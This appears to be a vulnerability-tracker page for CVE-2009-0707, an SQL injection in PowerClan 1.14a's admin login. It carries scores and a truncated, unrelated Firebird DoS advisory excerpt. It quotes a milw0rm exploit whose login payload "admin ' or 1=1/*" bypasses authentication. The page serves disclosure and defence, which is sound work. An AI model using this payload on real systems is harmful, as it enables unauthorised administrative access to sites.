CVE-2009-0707
published 2009-02-23CVE-2009-0707: SQL injection vulnerability in admin/index.php in PowerClan 1.14a allows remote attackers to execute arbitrary SQL commands via the loginemail parameter (aka…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.05%
78.8th percentile
SQL injection vulnerability in admin/index.php in PowerClan 1.14a allows remote attackers to execute arbitrary SQL commands via the loginemail parameter (aka login field). NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| powerscripts | powerclan | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Firebird SQL - op_connect_request main listener shutdown
exploitdb·2009-07-28·CVSS 5.0
CVE-2009-2620 [MEDIUM] Firebird SQL - op_connect_request main listener shutdown
Firebird SQL - op_connect_request main listener shutdown
---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Firebird SQL op_connect_request main listener shutdown vulnerability
1. *Advisory Information*
Title: Firebird SQL op_connect_request main listener shutdown vulnerability
Advisory ID: CORE-2009-0707
Advisory URL: http://www.coresecurity.com/content/firebird-sql-dos
Date published: 2009-07-28
Date of last update: 2009-07-28
Vendors contacted: Firebird SQL
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Denial of service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 35842
CVE Name: CVE-2009-2620
3. *Vulnerability Description*
Firebird SQL [1] is
Exploit-DB
PowerClan 1.14a - Authentication Bypass
exploitdb·2009-01-01
CVE-2009-0707 PowerClan 1.14a - Authentication Bypass
PowerClan 1.14a - Authentication Bypass
---
#######################################################################################
# #
# ...:::::PowerClan 1.14a (Auth Bypass) SQL Injection Vulnerability::::.... #
#######################################################################################
Virangar Security Team
www.virangar.net
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
exploit:
path to admin area: /admin
login: admin ' or 1=1/*
pass:[whatever]
---
young iranian h4ck3rz
# milw0rm.com [2009-01-01]
No writeups or analysis indexed.
http://osvdb.org/51112http://secunia.com/advisories/33362http://www.securityfocus.com/bid/33083https://exchange.xforce.ibmcloud.com/vulnerabilities/47702https://www.exploit-db.com/exploits/7642http://osvdb.org/51112http://secunia.com/advisories/33362http://www.securityfocus.com/bid/33083https://exchange.xforce.ibmcloud.com/vulnerabilities/47702https://www.exploit-db.com/exploits/7642
2009-02-23
Published